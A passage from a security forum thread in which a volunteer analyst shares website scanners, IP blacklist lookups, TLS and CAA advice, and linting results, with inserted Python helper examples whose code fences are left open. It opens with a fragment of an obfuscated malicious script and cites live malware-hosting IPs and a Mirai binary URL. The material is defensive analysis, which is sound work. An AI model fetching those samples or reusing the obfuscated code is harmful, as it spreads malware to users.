if (_0x9312x7$jscomp$1 = _0x9312x2$jscomp$0[_0x9024[41]](_0x9024[40]), _0x9312x8$jscomp$1 = _0x9312x2$jscomp$0[_0x9024[41]](_0x9024[40]), _0x9312x7$jscomp$1[_0x9024[42]] = _0x9312x5$jscomp$1[_0x9024[10]](_0x9024[13]), _0x9312x8$jscomp$1[_0x9024[42]] = _0x9312x4$jscomp$2[_0x9024[28]], _0x9312x8$jscomp$1[_0x9024[43]] === _0x9312x7$jscomp$1[_0x9024[43]]) {
if (_0x9312x2$jscomp$0[_0x9024[44]] === _0x9312x5$jscomp$1) {
_0x9312x1$jscomp$0[_0x9024[46]][_0x9024[45]][_0x9024[42]] = _0x9312x4$jscomp$2[_0x9024[28]];
}
}
}
} else {
}
}
}
}
}
}, _0x9312x4$jscomp$0) {
_0x9312x1$jscomp$0[_0x9024[22]](_0x9024[27], _0x9312x1$jscomp$0[_0x9024[23]][_0x9024[24]], false);
_0x9312x2$jscomp$0[_0x9024[22]](_0x9024[47], _0x9312x3$jscomp$0, false);
_0x9312x1$jscomp$0[_0x9024[22]](_0x9024[48], _0x9312x3$jscomp$0, false);
}
}
}(window, document);

Also a good read for researchers of bad code: http://relentless-coding.org/projects/jsdetox/samples
Project: https://javadeobfuscator.com/

polonus
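The script quoted above is obfuscated with the classic string-array trick: every property name and literal is stored as a hex-escaped string in `_0x9024` and referenced by index. The online unobfuscator undoes exactly that, and it can also be done offline. What follows is an added example, not code from the post or from any of the tools linked here; it runs on a short constructed array (`SAMPLE`) built in the same style as the quoted file, rewrites `obj[_0x9024[n]]` into dotted property access, replaces bare `_0x9024[n]` with the decoded literal, and drops the array declaration.

```python
import json
import re

# Constructed sample in the same style as the obfuscated wp-embed.min.js
# quoted above: a hex-escaped string array plus code indexing into it.
SAMPLE = (
    'var _0x9024=["\\x75\\x73\\x65\\x20\\x73\\x74\\x72\\x69\\x63\\x74",'
    '"\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66","\\x61\\x70\\x70\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E",'
    '"\\x4D\\x53\\x49\\x45\\x20\\x31\\x30"];'
    '!function(w,d){_0x9024[0];'
    'var ie=-1!==navigator[_0x9024[2]][_0x9024[1]](_0x9024[3]);}(window,document)'
)

# "var _0xNNNN=[ ... ];" (assumes the array body holds no "];" inside a string)
ARRAY_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\];', re.S)
# one JS string literal, double- or single-quoted, with backslash escapes
STR_RE = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')
ESC_RE = re.compile(r'\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|.)')
IDENT_RE = re.compile(r'^[A-Za-z_$][\w$]*$')


def js_unescape(literal):
    """Decode \\xHH, \\uHHHH and the common single-character escapes."""
    def repl(mo):
        esc = mo.group(1)
        if esc[0] in 'xu':
            return chr(int(esc[1:], 16))
        return {'n': '\n', 't': '\t', 'r': '\r', '0': '\0'}.get(esc, esc)
    return ESC_RE.sub(repl, literal)


def deobfuscate(src):
    """Return (rewritten source, decoded string table)."""
    m = ARRAY_RE.search(src)
    if not m:
        return src, []
    name, body = m.group(1), m.group(2)
    table = [js_unescape(a or b) for a, b in STR_RE.findall(body)]
    # drop the declaration itself; nothing else needs the array any more
    rest = src[:m.start()] + src[m.end():]

    def lookup(idx):
        i = int(idx)
        return table[i] if i < len(table) else None

    def prop(mo):  # obj[_0x9024[n]]  ->  obj.name  or  obj["literal"]
        s = lookup(mo.group(1))
        if s is None:
            return mo.group(0)
        return '.' + s if IDENT_RE.match(s) else '[' + json.dumps(s) + ']'

    def plain(mo):  # _0x9024[n]  ->  "literal"
        s = lookup(mo.group(1))
        return mo.group(0) if s is None else json.dumps(s)

    rest = re.sub(r'\[' + re.escape(name) + r'\[(\d+)\]\]', prop, rest)
    rest = re.sub(re.escape(name) + r'\[(\d+)\]', plain, rest)
    return rest, table


if __name__ == '__main__':
    code, table = deobfuscate(SAMPLE)
    print(table)
    print(code)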
Title: Re: Tests and other Media topics
Post by: polonus on February 28, 2019, 12:25:28 AM
Do a connection test: http://conn.internet.nl/connection/

and a good DNS domain check site: https://www.uptrends.com/de/tools/dns

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 28, 2019, 04:06:50 PM
Spectre is going to haunt us for some considerable time: https://arxiv.org/abs/1902.05178

Is your browser vulnerable to Spectre?

Check online: https://xlab.tencent.com/special/spectre/spectre_check.html

According to their checking my browser, it is NOT vulnerable to Spectre  :)
Title: Re: Tests and other Media topics
Post by: polonus on March 02, 2019, 05:21:58 PM
Checking a URLHaus flagged IP, like this one: https://urlhaus.abuse.ch/url/149963/
Interesting information at shodan's,  about ports, services, vulnerabilities:
https://www.shodan.io/host/157.230.214.179
Via additional insights we landed here: https://viz.greynoise.io/ip/157.230.214.179
Quote
Name    Category    Intention    Confidence    First Seen    Last Updated
ZMAP_CLIENT   tool   Null   high   2019-02-26   2019-02-26
SSH_SCANNER_LOW   activity   Null   low   2019-02-26   2019-02-26
TELNET_SCANNER_HIGH   activity   Null   high   2019-02-23   2019-02-23
TELNET_BRUTEFORCER   worm   malicious   high   2019-02-18   2019-02-23
TELNET_BRUTEFORCER   worm   malicious   high   2019-02-18   2019-02-18
TELNET_SCANNER_HIGH   activity   Null   high   2019-02-18   2019-02-18
TELNET_WORM_HIGH   worm   malicious   high   2019-02-11   2019-02-12
TELNET_SCANNER_HIGH   activity   Null   high   2019-02-11   2019-02-12
ZMAP_CLIENT   tool   Null   high   2019-02-11   2019-02-11

See security issues: https://webscan.upguard.com/#/http://157.230.214.179/bins/apep.x86
(5) Susceptible to man-in-the-middle attacks
Server information header exposed
Exposing information about the server version increases the ability of attackers to exploit certain vulnerabilities. The website configuration should be changed to prevent version information being revealed in the 'server' header.
EXPECTED:
[does not contain version number]
FOUND:
Apache/2.2.15 (CentOS)

 Unnecessary open ports
File sharing ports open
Administration ports open
Database ports open

4 recommendations for improvement: https://webhint.io/scanner/78d6da89-0627-4623-b8ec-791b36e0cb5e
This low number of issues could lead to the assumption that the website was specifically created for abuse...

Unable to connect here: https://observatory.mozilla.org/analyze/157.230.214.179#ssh
Also consider this info: https://dazzlepod.com/ip/?ip_address=http%3A%2F%2F157.230.214.179 *
and this: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=MTU3LjIzMC4yMTQuMTc5~enc

Finally the VT results: Kaspersky detect: https://www.virustotal.com/#/url/8ae84bf6f178a29649f2aaf6d00e5382783921d1b2b40acd6f5fbdb64f089833/detection
Avast detects here: https://www.virustotal.com/#/file/d221870a49a0ab336dfa7d9387add53443e0a6a8ca4c0b6851830fb9d7652bfa/detection

IP scan downloaded files: https://www.virustotal.com/#/ip-address/157.230.214.179

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)

* All info from scans like these cannot and should not be used against the particular websites in question, this is offensive conduct.

Damian
Title: Re: Tests and other Media topics
Post by: polonus on March 02, 2019, 05:32:10 PM
Dr.Web Security Space does not flag it...

Here it is not listed: Checking: -http://157.230.214.179/bins/apep.x86
Engine version: 7.0.34.11020
Total virus-finding records: 7513830
File size: 83.06 KB
File MD5: 3802fd9b541c4711d683408def246be2

-http://157.230.214.179/bins/apep.x86 - Ok (So actually Not OK).

Also checked here:
Quote
IP Address Information
Analysis Date   2019-03-02 11:30:42
Elapsed Time   4 seconds
Blacklist Status   BLACKLISTED 7/114
IP Address   157.230.214.179
Reverse DNS   Unknown
ASN   AS14061
ASN Owner   DigitalOcean, LLC
ISP   Digital Ocean
Continent   North America
Country Code   (US) United States
Latitude / Longitude   40.7185 / -74.0025
City   New York
Region   New York
IP Blacklist Report
Engine
BlockedServersRBL
CBL_AbuseAt
MegaRBL
S5hbl
SURBL
AlienVault Reputation
IPSpamList
Bold have it flagged...
Anti-Attacks BL
AntiSpam_by_CleanTalk
Autoshun
Backscatterer
BadIPs
Bambenek Consulting
Barracuda_Reputation_B...
BBcan177 (pfBlockerNG)
BinaryDefense Ban List
Blacklists_co
Blocklist.net.ua
BlockList_de
BloggingFusion BL
BlogSpamBL
Bogons_Team_Cymru
Booru BL
Botvrij.eu
Brute Force Blocker
Bytefarm_ch IP BL
C-APT-ure
CERT.gov.ge
CERT-PA
Charles Haley
CI Army List
CSpace Hostings IP BL
Cybercrime-tracker.net
CyberCure
Darklist.de
DataPlane.org
DNSBL_AbuseCH
DroneBL
EFnet_RBL
EmergingThreats
Ens160 SSH BL
Etnetera BL
Feodo Tracker
FSpamList
GPF DNS Block List
GreenSnow Blocklist
ImproWare Antispam
InterServer IP List
IPSum
Ip-finder.me
JustSpam_org
LAPPS Grid Blacklist
LashBack UBL
Log.Onoh.Info
Malc0de
MalwareDomainList
Matapala_org FW Log
MaxMind High Risk IPs
MKXT_NET SSH BL
Migniot SSH Bullies
Ms-ds-violation-ips
Myip.ms Blacklist
NEU SSH Black list
NiX_Spam
NoIntegrity BL
NordSpam
NoThink.org
Olegon Blocked IPs
Organized Villainy Sea...
Peter-s NUUG IP BL
PlonkatronixBL
PhishTank
Pofon_foobar_hu
ProjectHoneypot
PSBL
Ransomware Tracker
Redstout Threat IP lis...
Reuteras Scanning List...
Roquesor BL
Rutgers Drop List
S.S.S.H.I.A
SANYALnet Labs Mirai I...
Sblam
Scientific_Spam_BL
SCUMWARE
Shinmura BL
Snort IPFilter
SORBS
SpamCop
SpamEatingMonkeyBL
SpamRATS
SpyEye Tracker
SSL Blacklist
St Dominics Priory Col...
Stefan Gofferje
StopForumSpam
Suomispam_RBL
Swinog_DNSRBL
Taichung Education Cen...
TalosIntel IPFilter
Threat Crowd
Threat Sourcing
ThreatLog
Turris Greylist
URIBL
URLVir
USTC IP BL
VirBL
VXVault
WebIron_RBL
Websworld.org
WPBL
ZeuS Tracker
Xtream Codes BL

pol
Title: Re: Tests and other Media topics
Post by: polonus on March 10, 2019, 12:34:58 AM
Two interesting chrome extensions I run inside Brave browser:
Javascript Errors Notifier
also check code by opening page in Browser with developer tools via Ctrl+Shift+I
Detected on this site: https://www.ninefornews.nl/
Re: ReferenceError: st_go is not defined
 /:4181

The Retire.js extension also works, and on the same page it flagged: jquery   1.8.3   Found in https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js
Vulnerability info:
Medium   CVE-2012-6708 11290 Selector interpreted as HTML   
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers
all as retirable jQuery library.

Javascript could be at the root of a lot of malcode trouble, so check and doublecheck always,
especially when developing websites and maintaining websites.

Double check at: jquery   1.8.3   Found in https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js
Vulnerability info:
Medium   CVE-2012-6708 11290 Selector interpreted as HTML   123
Medium   2432 3rd party CORS request may execute CVE-2015-9251   1234
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers

and also at  the security part of the webhint scanner: https://webhint.io/scanner/
or validate here: https://codebeautify.org/jsvalidate

Good hunt, javascript de-buggers,

polonus (volunteer 3rd party cold reconnaissance website security analyzer and website error-hunter)

P.S. Added is a txt file of messages and alerts in the developer's console for a shodan page,
     just skim over the contents.


Title: Re: Tests and other Media topics
Post by: polonus on March 10, 2019, 01:10:21 AM
Another report for this site flagged at urlquery dot net:
https://urlquery.net/report/4ea473d5-765f-4c09-9ac8-a805504606a8

Quote
File not found: -https://apis.google.com/js/plusone.js

ReferenceError: gapi is not defined
 -http://dahluhre.blogspot.com/:369

SyntaxError: Unexpected token <
 /:65

SyntaxError: Unexpected strict mode reserved word
 /:65

SyntaxError: Invalid or unexpected token
 /:65

SyntaxError: Unexpected identifier
 /:65

SyntaxError: Unexpected token <
 /:65

SyntaxError: Unexpected token &
 /:65

ReferenceError: urchinTracker is not defined
 -http://dahluhre.blogspot.com/:2390

SyntaxError: Unexpected token &
 -http://dahluhre.blogspot.com/:64

SyntaxError: Invalid or unexpected token
 -http://dahluhre.blogspot.com/:64

SyntaxError: Unexpected identifier
 -http://dahluhre.blogspot.com/:64

SyntaxError: Unexpected token <
 -http://dahluhre.blogspot.com/:64

SyntaxError: Unexpected strict mode reserved word
 -http://dahluhre.blogspot.com/:64

SyntaxError: Unexpected token <
 -http://dahluhre.blogspot.com/:64
Quote
Consider also here: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=I3xobHVofXsubl0%3D~enc
iFrame flagged: iframes
Any iframes? Yes there are. show.

<iframe src="-http://www.dahluhre.blogspot.com" frameborder="0" width="100%" height="100%"></iframe>

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 29, 2019, 02:31:57 PM
PHISHING, a gigantic online problem. Now meet a Plan for Scams.
https://www.gerv.net/security/a-plan-for-scams/ 
(propositions by various members of Mozilla Team).

Are there any new ideas coming from the intensified efforts of EUROPOL and the industry fighting PHISHING?

I think, if while visiting a phishing website a "whois" were performed for that website's domain name,
and one checked whether the created and/or changed date is less than a week old,
one would have caught out 95% of phishing websites.

Within a few days you'd see these domains added to be blacklisted.
Are they being flagged in all browsers then immediately?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 01, 2019, 11:51:02 PM
The Reg has Admedo tracking. Where? -> https://www.theregister.co.uk/security/
What's that tracker?
Find out here: https://whotracks.me/trackers/admedo_com.html
Failed to load for me: -pj.l.admedo.com/admtracker.lib.min.js:1 F

Tracking on websites: https://whotracks.me/websites/avast.com.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 07, 2019, 11:23:05 PM
Checklists for intrusions from USA and around the globe:

Checked: https://urlhaus.abuse.ch/url/172785/
Re: https://www.megarbl.net/asncheck/AS6128  checklist per ASN,
also this one per IP: https://www.megarbl.net/blocking_list.php?ip=69.119.9.169
We missed such a resource for quite some time now, until it returned in this form.
Also see: https://otx.alienvault.com/pulse/5ad51668240faa094ef77c68/history
And the daily: https://attackers.ongoing.today/closed.txt

More lists to check against, with this IP example: 92.53.65.2
Re: https://www.abuseipdb.com/check/92.53.65.2
also a university resource:  https://report.cs.rutgers.edu/mrtg/drop/dropstat.cgi?start=-3h
cybersecurity resource: https://www.binarydefense.com/banlist.txt?__hstc=103210719.1bb630f9cde2cb5f07430159d50a3c91.1538179200074.1538179200075.1538179200076.1&__hssc=103210719.1.1538179200077&__hsfp=2025384311  *

Enjoy, my good friends, enjoy,

* Use of the above list may be for strict private use only, and commercial use therefore is forbidden.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 11, 2019, 06:24:48 PM
AMP Page Validator: https://technicalseo.com/seo-tools/amp/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 20, 2019, 06:31:47 PM
Two resources coming up with similar abuse information for IP 46.17.42.130
https://urlhaus.abuse.ch/url/181145/
&
https://futex.re/tracker/index.php  (do not download red samples)

Linux Mirai example,  avast will detect this as ELF:Mirai-HU [Trj]:
https://www.virustotal.com/nl/file/4175d70a1c20164552c2d446f5bb56dcf4f02c1c4e4e5a99385b37076db725f7/analysis/1555674337/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 22, 2019, 07:42:53 PM
A fine tool to check on DNS, example: https://dnscheck.pingdom.com/#5a9186d122400000

Combine it with all of the toolbox here: https://mxtoolbox.com/

And here:  https://www.robtex.com/dns-lookup/

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 23, 2019, 11:08:49 AM
Two scanners to compare results for trackers:
1. CLIQZ and Ghostery driven: https://whotracks.me/websites/theregister.co.uk.html
&
2. beta scanner with privacy implications of visiting a website:
https://privacyscore.org/site/36977/

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 24, 2019, 12:58:04 PM
For Germany and the Netherlands new directives on the use of the latest TLS version 1.3 came out.

So it is time to check:
https://www.cdn77.com/tls-test and at http://ssl-checker.online-domain-tools.com/

Following should be phased out in due time and one better no longer support such weak TLS:
TLS 1.0, TLS 1.1 and 3DES, and algorithms for static key exchange.

Also consider: https://geekflare.com/ssl-test-certificate/
example: https://www.immuniweb.com/ssl/?id=nU20eqHp

polonus

P.S. But Windows Exchange servers should also be upgraded,
else taking such measures is senseless from a certain perspective,
when it is not supported elsewhere on the infrastructure.
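The phase-out list above (TLS 1.0, TLS 1.1, 3DES, static key exchange) is easiest to enforce where it is configured, before any online scanner sees the host. The following is an added example and not code from the post or from any of the linked test sites: a small checker for nginx-style `ssl_protocols` / `ssl_ciphers` directives, run over two constructed fragments, one that still allows the deprecated protocols and cipher families and one that only allows TLS 1.2/1.3 with ECDHE suites. It inspects explicit OpenSSL cipher names only; aliases such as `HIGH` are not expanded, so expand them with `openssl ciphers -v` first if the configuration uses them.

```python
import re

# Constructed nginx TLS fragments; the "weak" one keeps the protocols and
# cipher families the directives named above say to phase out.
WEAK_CONF = """
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers AES128-SHA:DES-CBC3-SHA:ECDHE-RSA-AES128-GCM-SHA256;
"""

HARDENED_CONF = """
ssl_protocols TLSv1.2 TLSv1.3;
ssl_ciphers ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256;
ssl_prefer_server_ciphers off;
"""

DEPRECATED_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1", "TLSv1.1"}
# OpenSSL suite names without a DHE-/ECDHE- prefix use static RSA key exchange,
# so a recorded session can be decrypted later if the server key ever leaks.
STATIC_KX_RE = re.compile(r"^(?:AES|DES|CAMELLIA|SEED|IDEA|RC4|NULL)")


def _directive(conf, name):
    """Return the argument string of the first `name ...;` directive, or None."""
    m = re.search(r"^\s*" + name + r"\s+([^;]+);", conf, re.M)
    return m.group(1).strip().strip("'\"") if m else None


def check_nginx_tls(conf):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    protos = _directive(conf, "ssl_protocols")
    for p in (protos or "").split():
        if p in DEPRECATED_PROTOCOLS:
            findings.append(f"deprecated protocol enabled: {p}")
    ciphers = _directive(conf, "ssl_ciphers")
    for c in (ciphers or "").split(":"):
        if not c or c[0] in "!-":
            continue  # exclusions never enable anything
        if "DES-CBC3" in c or "3DES" in c:
            findings.append(f"3DES cipher enabled: {c}")
        if "RC4" in c or c.endswith("-MD5"):
            findings.append(f"broken cipher enabled: {c}")
        if c in ("kRSA", "RSA") or STATIC_KX_RE.match(c):
            findings.append(f"static key exchange, no forward secrecy: {c}")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, check_nginx_tls(conf) or "no findings")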

Title: Re: Tests and other Media topics
Post by: polonus on April 28, 2019, 06:55:57 PM
A certificate test for a domain produces two A+ results: https://www.sslcheck.nl/mett.nl
all checked for a Dutch gov. subcontractor certificate.

However there were weak ciphers and there was a CAA issue,
which could be solved here with this generator: https://sslmate.com/caa/

Re: https://cipherli.st/

produced:
Quote
Generic
For Google Cloud DNS, Route 53, DNSimple, and other hosted DNS services

Name   Type   Value
mett.nl.   CAA   0 issue ";"
Standard Zone File
For BIND ≥9.9.6, PowerDNS ≥4.0.0, NSD ≥4.0.1, Knot DNS ≥2.2.0

mett.nl.   IN   CAA   0 issue ";"
Legacy Zone File (RFC 3597 Syntax)
For BIND <9.9.6, NSD <4.0.1, Windows Server 2016

-mett.nl.   IN   TYPE257   \# 8 000569737375653B
tinydns
:-mett.nl:257:\000\005\151\163\163\165\145\073
dnsmasq
--dns-rr=-mett.nl,257,000569737375653B

enjoy, my good avast friends, enjoy,

polonus

Also consider info here: https://www.entrustdatacard.com/knowledgebase/how-to-add-a-certification-authority-authorization-caa-record-using-tinydns  and another tool: https://tools.ietf.org/html/rfc6844#section-5
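The generator output quoted above shows the same CAA record four ways, and the three "legacy" forms are just the RFC 6844 wire format (one flags byte, one tag-length byte, the tag, the value) written as hex or octal. The following is an added example, not code from the post or from sslmate's generator: it builds that RDATA, emits the RFC 3597, tinydns and dnsmasq lines for the record quoted above, decodes a hex record back, and explains what the record means (a value of `;` means no CA may issue at all, which is why it also works as a deny-all record while the real issuer is being set up).

```python
import re

TAG_RE = re.compile(r"^[a-z0-9]+$")  # RFC 6844 property tags


def caa_rdata(flags, tag, value):
    """Build RFC 6844 CAA RDATA: flags byte, tag length byte, tag, value."""
    if not 0 <= flags <= 255:
        raise ValueError("flags must fit in one byte")
    if not TAG_RE.match(tag):
        raise ValueError("tag must be lowercase alphanumeric")
    tag_b = tag.encode("ascii")
    return bytes([flags, len(tag_b)]) + tag_b + value.encode("utf-8")


def rfc3597(owner, flags, tag, value):
    """Generic (unknown-type) zone-file form for BIND <9.9.6 / NSD <4.0.1."""
    rd = caa_rdata(flags, tag, value)
    return f"{owner} IN TYPE257 \\# {len(rd)} {rd.hex().upper()}"


def tinydns(owner, flags, tag, value):
    """tinydns data line: record type 257 with octal-escaped RDATA."""
    rd = caa_rdata(flags, tag, value)
    return f":{owner.rstrip('.')}:257:" + "".join(f"\\{b:03o}" for b in rd)


def dnsmasq(owner, flags, tag, value):
    """dnsmasq --dns-rr argument: name, type number, hex RDATA."""
    rd = caa_rdata(flags, tag, value)
    return f"--dns-rr={owner.rstrip('.')},257,{rd.hex().upper()}"


def parse_rfc3597(hexdata):
    """Decode hex CAA RDATA back into (flags, tag, value)."""
    rd = bytes.fromhex(hexdata)
    if len(rd) < 2:
        raise ValueError("truncated CAA RDATA")
    flags, tag_len = rd[0], rd[1]
    if len(rd) < 2 + tag_len:
        raise ValueError("truncated CAA RDATA")
    tag = rd[2:2 + tag_len].decode("ascii")
    value = rd[2 + tag_len:].decode("utf-8")
    return flags, tag, value


def describe(flags, tag, value):
    """Plain-language meaning of an issue / issuewild record."""
    critical = "critical" if flags & 0x80 else "non-critical"
    kind = "any certificate" if tag == "issue" else "wildcard certificates"
    if tag in ("issue", "issuewild"):
        if value.strip() == ";":
            return f"{critical}: no CA may issue {kind}"
        return f"{critical}: only {value} may issue {kind}"
    return f"{critical}: {tag}={value}"


if __name__ == "__main__":
    print(rfc3597("mett.nl.", 0, "issue", ";"))
    print(tinydns("mett.nl.", 0, "issue", ";"))
    print(dnsmasq("mett.nl.", 0, "issue", ";"))
    print(describe(*parse_rfc3597("000569737375653B")))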
Title: Re: Tests and other Media topics
Post by: polonus on May 01, 2019, 01:09:28 PM
JavaScript and SEO, all you wanted to know.

Pre-loading the DOM first is advisable.
On your website - be crawlable for both Googlebot and Caffeine alike.
Google and Caffeine are often mixed-up even by Google's staff members.

Make sure your content does not depend solely on JavaScript, but also on HTML.
In the future Googlebot may render newest JavaScript.
(now renders 2018 script through the 69 version of the browser,
later will come to use the latest version);
writing isomorphic Javascript being pre-rendered on the webserver may help SEO,
and load performance, but the apt developer must have the capacity to implement this.

Google plans to integrate crawling and rendering, as planned at their 2018 Chrome Dev Summit,
but JavaScript issues may remain, so there will still be reports coming from analysts like little old me.

Info credits go to Marketingfacts JavaScript & SEO,
all you should know by Tom Wester SEO-strategist at RIFF's.


Test your performance on the client and webserver here,
-> https://gtmetrix.com/reports/

Enjoy, my good avast friends, enjoy,

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on May 03, 2019, 04:23:42 PM
Linting JavaScript code with JSHint at https://jshint.com/

What script was checked:  https://www.security.nl/js/core.js?13757912339  DOM-XSS 39 sources and 16 sinks detected.
beautifying and code improvement results:
Quote
CONFIGURE
Metrics
There are 86 functions in this file.

Function with the largest signature take 4 arguments, while the median is 1.

Largest function has 38 statements in it, while the median is 4.

The most complex function has a cyclomatic complexity value of 7 while the median is 2.

Nine warnings
27   ['position'] is better written in dot notation.
175   Missing semicolon.
288   'result' is already defined.
295   'result' is already defined.
556   Missing semicolon.
750   Missing semicolon.
778   A leading decimal point can be confused with a dot: '.45'.
840   ['compatability'] is better written in dot notation.
1207   Missing semicolon.
Three undefined variables
29   $
31   $
33   $
35   $
37   $
39   $
41   $
43   $
45   $
47   $
49   $
51   $
53   $
55   $
57   $
59   $
61   $
63   $
65   $
67   $
69   $
71   $
73   $
75   $
77   $
79   $
83   $
85   $
87   $
93   $
95   $
97   $
101   $
111   $
116   $
141   $
143   $
145   $
149   $
153   $
159   $
188   $
203   $
216   $
220   $
222   $
224   $
233   $
240   $
247   $
254   $
263   $
272   $
274   $
282   $
304   $
306   $
308   $
318   $
329   $
331   $
333   $
335   $
345   $
363   $
374   $
376   $
378   $
388   $
399   $
401   $
403   $
405   $
407   $
409   $
419   $
435   $
443   $
456   $
458   $
464   $
472   $
476   $
494   $
496   $
509   $
513   $
515   $
523   $
529   $
537   $
539   $
541   $
565   $
567   $
569   $
571   $
585   $
594   $
614   $
622   $
633   $
637   $
645   $
651   $
676   $
695   $
701   $
703   $
705   $
711   $
715   $
715   $
719   $
723   $
725   $
734   $
738   $
742   $
759   $
761   $
763   $
767   $
776   $
778   $
780   $
788   $
790   $
792   $
799   $
806   $
810   $
812   $
812   $
818   $
820   $
831   $
833   $
840   $
848   $
850   $
852   $
862   $
864   $
880   $
888   $
904   $
908   $
938   $
940   $
962   $
964   $
986   $
988   $
1010   $
1012   $
1032   $
1036   $
1052   $
1056   $
1058   $
1079   $
1081   $
1085   $
1089   $
1091   $
1112   $
1114   $
1118   $
1120   $
1122   $
1142   $
1144   $
1166   $
1168   $
1170   $
1177   $
1179   $
1188   $
1190   $
1203   $
1229   $
1233   $
1237   $
1245   $
1245   $
1247   $
1256   $
1258   $
1267   $
1269   $
1276   $
1278   $
1285   $
1287   $
1289   $
254   mytoken
345   mytoken
421   mytoken
478   mytoken
531   mytoken
596   mytoken
655   mytoken
742   mytoken
838   mytoken
866   mytoken
1205   mytoken
1237   mytoken
697   width
703   width
Three unused variables
21   default_hover_options
23   default_video_options
133   preload

For JavaScript debuggers, enjoy, my friends, enjoy.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 08, 2019, 05:59:50 PM
Everybody wants an honest webshop experience, don't they?

Check here whether it can be trusted:
Re: https://www.trustpilot.com/

Some things to check and go over:
1. Is the product genuine or is it a cheap and lousy imitation?
2. How does the webshop look, sloppy, bad presentation of consumer goods,
    Does it have bad grammar and misspellings?
3. Is there an under construction message to mask bad construction?
4. How did others qualify that webshop? Has it a bad online rep?
5. Check the registration of the site online. Is it a scam or a known fraud?
6. Do you have a secure connection to it? Green lock - https & tls right version?
7. What category webshop gives a major chance this could mean scam or fraud?
8. When paying credit card, claim damage in time when goods do not arrive,
9. Report to authorities even when there is small chance the owners will get nailed.
(source credits go to Dutch AD.nl newspaper's article)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 21, 2019, 05:07:27 PM
Performance reports can also indicate possible security implications:
See: https://gtmetrix.com/reports/www.hotline40.com.au/Gux43WX9

Combine with: https://securityheaders.com/
an F-grade result here: https://securityheaders.com/?q=https%3A%2F%2Fwww.hotline40.com.au%2F&followRedirects=on

enjoy,

polonus
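The two scanner findings quoted in this thread, the UpGuard "Server information header exposed" result for the Apache/2.2.15 host earlier and the securityheaders.com F grade here, both come down to reading the response headers. The following is an added example, not code from the post or from either scanner: it parses a raw HTTP response head and reports missing hardening headers, version disclosure in `Server` / `X-Powered-By`, missing framing protection (the clickjacking check from earlier in this thread) and a short HSTS max-age. The two response heads are constructed; the Apache/2.2.15 value is the one quoted above, and the 180-day HSTS threshold is my own choice, not a scanner's.

```python
import re

# Constructed raw response head with the Server value UpGuard flagged above;
# not captured from any real host.
WEAK_RAW = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.15 (CentOS)\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

# Constructed hardened counterpart.
HARDENED_RAW = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Referrer-Policy: strict-origin-when-cross-origin\r\n"
    "Permissions-Policy: camera=(), microphone=()\r\n"
    "\r\n"
)

REQUIRED = (
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Content-Type-Options",
    "Referrer-Policy",
    "Permissions-Policy",
)
VERSION_RE = re.compile(r"/\d+(?:\.\d+)+")  # e.g. "Apache/2.2.15"
MIN_HSTS_AGE = 15552000  # 180 days; my threshold, not a scanner's


def parse_head(raw):
    """Split a raw HTTP response head into a lower-cased header dict."""
    headers = {}
    for line in raw.split("\r\n")[1:]:  # skip the status line
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def audit(raw):
    """Return a list of findings; an empty list means nothing was flagged."""
    h = parse_head(raw)
    findings = []
    for name in REQUIRED:
        if name.lower() not in h:
            findings.append(f"missing {name}")
    # version disclosure, the point UpGuard raised about the Server header
    for leak in ("server", "x-powered-by"):
        value = h.get(leak, "")
        if VERSION_RE.search(value):
            findings.append(f"{leak} header reveals version: {value}")
    # clickjacking: either CSP frame-ancestors or a strict X-Frame-Options
    csp = h.get("content-security-policy", "")
    xfo = h.get("x-frame-options", "").upper()
    if "frame-ancestors" not in csp and xfo not in ("DENY", "SAMEORIGIN"):
        findings.append("no framing protection (CSP frame-ancestors or X-Frame-Options)")
    hsts = h.get("strict-transport-security", "")
    m = re.search(r"max-age=(\d+)", hsts)
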